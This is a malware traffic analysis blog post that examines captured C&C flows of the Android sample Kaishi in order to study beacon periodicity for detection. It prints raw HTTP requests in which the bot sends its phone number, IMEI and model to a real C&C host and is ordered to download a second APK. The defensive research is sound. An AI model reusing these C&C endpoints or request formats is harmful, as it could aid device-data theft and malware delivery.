Analysis of the traffic of an APK malware

This is an analysis of the traffic generated by the APK sample 46a2468a6ee9a7740191747d1b7b16a5 that was downloaded from the CopperDroid project. Virus Total detects this sample as a malware called Kaishi (probably related with banks attacks) and although the malware is from May 2014, in Mar 12, 2015 only two Antivirus engines detect it.

Connections and Models

We used the stf tool to analyze the pcap file generated by the malware. First we imported it as a new dataset and then we generated the connections and models of this sample. The behavioral models of this sample are:

 Note | Model Id | State |
[   ] | 10.0.2.15-10.0.2.3--arp                   | a.
[   ] | 10.0.2.15-10.0.2.3-53-udp                 | b.
[ 23] | 10.0.2.15-192.210.58.101-22205-tcp        | 88,y,h,i,i,Z.I.Z+z,Z.Z,I,i,h,
[   ] | 10.0.2.2-10.0.2.15-5555-tcp               | i.
Amount of models printed: 4

There are 4 connections in this capture, and only two are interesting. The ARP connection was automatically generated and therefore not related with the sample. The connection to the port 5555/TCP is part of the CopperDroid infrastructure and should also be discarded. The first interesting connection is the DNS request to resolve the domain wkwkwh05.gnway.cc. The connection 10.0.2.15-192.210.58.101-22205-tcp is the most interesting and worth analyzing further.

Connection to IP address 192.210.58.101 and port 22205/TCP

This connection was analyzed with the stf tool to show detailed information about the flows along with their payloads. The following is information extracted:

1. State: "8" TD: -1.0 T2: False T1: False        2014/09/15 09:45:29.988616,4.703461,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,15,1422,838,s[335]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 98..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....phonenumber=15555218135&model=generic&details=&type=1&nettype=cmwap&version=8&imei=000000000000000,d[202]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:41:13 GMT....10..{"respdata":"1"}..0....,
2. State: "8," TD: -1.0 T2: 0:00:12.834062 T1: False      2014/09/15 09:45:42.822678,3.31579,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24682,1794,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:41:26 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
3. State: "y," TD: 3.5798 T2: 0:00:45.943375 T1: 0:00:12.834062   2014/09/15 09:46:28.766053,3.375357,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24682,1794,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:42:12 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
4. State: "h," TD: 1.028397 T2: 0:00:44.674731 T1: 0:00:45.943375 2014/09/15 09:47:13.440784,7.456335,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,46,24618,1730,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:42:56 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
5. State: "i," TD: 1.033776 T2: 0:00:46.183687 T1: 0:00:44.674731 2014/09/15 09:47:59.624471,102.33783,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24682,1794,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:43:43 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
6. State: "i," TD: 1.049812 T2: 0:00:43.992341 T1: 0:00:46.183687 2014/09/15 09:48:43.616812,55.706921,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,15,1422,770,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=4&phonenumber=15555218135,d[270]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:44:26 GMT....54..{"respdata":"http://wkwkwh05.gnway.cc:22205/MyMsgInfo/res/apk/CallChangeSecond.apk"}..0....,
7. State: "Z." TD: 28.545824 T2: 0:00:01.541113 T1: 0:00:43.992341        2014/09/15 09:48:45.157925,267.331177,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,933,663504,32762,s[185]=GET /MyMsgInfo/res/apk/CallChangeSecond.apk HTTP/1.1..User-Agent: Dalvik/1.2.0 (Linux; U; Android 2.2.3; generic Build/FRK76C)..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive....,d[480]=HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Accept-Ranges: bytes..ETag: W/"607580-1409669488451"..Last-Modified: Tue 02 Sep 2014 14:51:28 GMT..Content-Type: application/vnd.android.package-archive..Content-Length: 607580..Date: Mon 15 Sep 2014 07:44:27 GMT....PK...........E................META-INF/MANIFEST.MF......M..0...w.......UA..t.....*....0..$..__....R.mf..........2....C.|......Q.=...Z.<h}Q..(.-.EDI..././K/..........1|;..u..B...vJ...{.t..(.?..".u:(K.X..``#J....K{.|....,
8. State: "I." TD: 1.210106 T2: 0:00:01.864910 T1: 0:00:01.541113 2014/09/15 09:48:47.022835,51.185951,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,46,24618,1730,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:44:30 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
9. State: "Z+" TD: 33.693143 T2: 0:01:02.834680 T1: 0:00:01.864910        2014/09/15 09:49:49.857515,202.543015,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24682,1794,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:45:39 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
10. State: "z," TD: 2.516928 T2: 0:00:24.964829 T1: 0:01:02.834680 2014/09/15 09:50:14.822344,177.406601,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,15,1422,770,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=4&phonenumber=15555218135,d[270]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:45:57 GMT....54..{"respdata":"http://wkwkwh05.gnway.cc:22205/MyMsgInfo/res/apk/CallChangeSecond.apk"}..0....,
11. State: "Z." TD: 19.464115 T2: 0:00:01.282608 T1: 0:00:24.964829        2014/09/15 09:50:16.104952,30.590263,tcp,10.0.2.15,   ->,192.210.58.101,22205,SPA_FSPA,0,0,921,662756,32122,s[185]=GET /MyMsgInfo/res/apk/CallChangeSecond.apk HTTP/1.1..User-Agent: Dalvik/1.2.0 (Linux; U; Android 2.2.3; generic Build/FRK76C)..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive....,d[480]=HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Accept-Ranges: bytes..ETag: W/"607580-1409669488451"..Last-Modified: Tue 02 Sep 2014 14:51:28 GMT..Content-Type: application/vnd.android.package-archive..Content-Length: 607580..Date: Mon 15 Sep 2014 07:45:57 GMT....PK...........E................META-INF/MANIFEST.MF......M..0...w.......UA..t.....*....0..$..__....R.mf..........2....C.|......Q.=...Z.<h}Q..(.-.EDI..././K/..........1|;..u..B...vJ...{.t..(.?..".u:(K.X..``#J....K{.|....,
12. State: "Z," TD: 27.446964 T2: 0:00:35.203696 T1: 0:00:01.282608        2014/09/15 09:50:51.308648,140.835754,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24681,1793,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:46:34 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
13. State: "I," TD: 1.287701 T2: 0:00:45.331817 T1: 0:00:35.203696 2014/09/15 09:51:36.640465,95.336082,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24682,1794,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:47:19 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
14. State: "i," TD: 1.015542 T2: 0:00:46.036344 T1: 0:00:45.331817 2014/09/15 09:52:22.676809,49.265224,tcp,10.0.2.15,   ->,192.210.58.101,22205,FSPA_FSPA,0,0,47,24682,1794,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:48:06 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,
15. State: "h," TD: 1.039808 T2: 0:00:47.868936 T1: 0:00:46.036344 2014/09/15 09:53:10.545745,2.935351,tcp,10.0.2.15,   ->,192.210.58.101,22205,SPA_SPA,0,0,42,24382,1602,s[267]=POST /MyMsgInfo/UserInfo HTTP/1.1..Content-Length: 30..Content-Type: application/x-www-form-urlencoded..Host: wkwkwh05.gnway.cc:22205..Connection: Keep-Alive..User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)..Expect: 100-Continue....type=2&phonenumber=15555218135,d[480]=HTTP/1.1 100 Continue....HTTP/1.1 200 OK..Server: Apache-Coyote/1.1..Content-Type: text/json;charset=UTF-8..Transfer-Encoding: chunked..Date: Mon 15 Sep 2014 07:48:54 GMT....2000..{"respdata2":"025223579|15448600|0222611372|0215448600|0220175400|023183545|0269433100|025594000|0338207000|0647200200|029900232|16445682|0338104500|0519107600|0515066500|0519907400|0216445682|0323256819|0423349000|0315474300|0532107100|0519122000|0327124100|0222481477|0322121177|0632788775|0313087,

The important things to note in this list are the State letter, the time difference between the flows, which are the numbers in seconds after the T2 column, and if you scroll to the right the payload of the flows. This is the complete output from the stf program for this connection.

Analysis of Connection to IP address 192.210.58.101 and port 22205/TCP

This connection has the following behavioral chain of states:

88,y,h,i,i,Z.I.Z+z,Z.Z,I,i,h,

According to our letter assignment strategy this behavioral chain of states is quite periodic because it is using the letters ‘h’, ‘i’ and ‘I’. However, not all the flows were periodic since we also have letters z and Z. If we analyze the payloads of the flows we may find a probable explanation of why the periodicity was lost. The analysis showed that:

  • The 1st flow sent some initial information to the C&C server and received back an small reponse: {“respdata”:”1”}
  • The 2nd flow sent less information, just an identification of the phone number of the bot, and received a large amount of data:

    {“respdata2”:”025223579|15448600|0222611372|0215448600|0220175400…

  • The time difference between the 1st and 2nd flow was 12 seconds.

  • The 3rd flow was like the 2nd, and the time difference between them was ~45 seconds.
  • The 4th flow was like the 3nd, and the time difference between them was ~44 seconds. This shows the periodicity.

    We may now suggest that when the C&C is working and idle it has a periodicity of ~45 seconds.

  • The 5th flow was like the 4th, and the time difference between them was ~46 seconds. Periodic.
  • The 6th flow is different, since the C&C server answered with some new commands:

    {“respdata”:”http://wkwkwh05.gnway.cc:22205/MyMsgInfo/res/apk/CallChangeSecond.apk”}.

This forced the bot to act inmediately since there is no purpose in waiting some time to complete the ordered action.

  • The 7th flow is the action requested by the C&C and the time difference with the 6th flow is acually 1.5 seconds.

Conclusion

This brieft analysis suggests that the periodicity of the C&C only holds when is working and idle. When the C&C channel receives some orders it seems to loose periodicity, which sounds rational. This type of activity is resposible that the C&C channels are usually not perfectly periodic, which it may help to detect them.


Written by Sebastian Garcia in Research Blog on Thu 12 March 2015.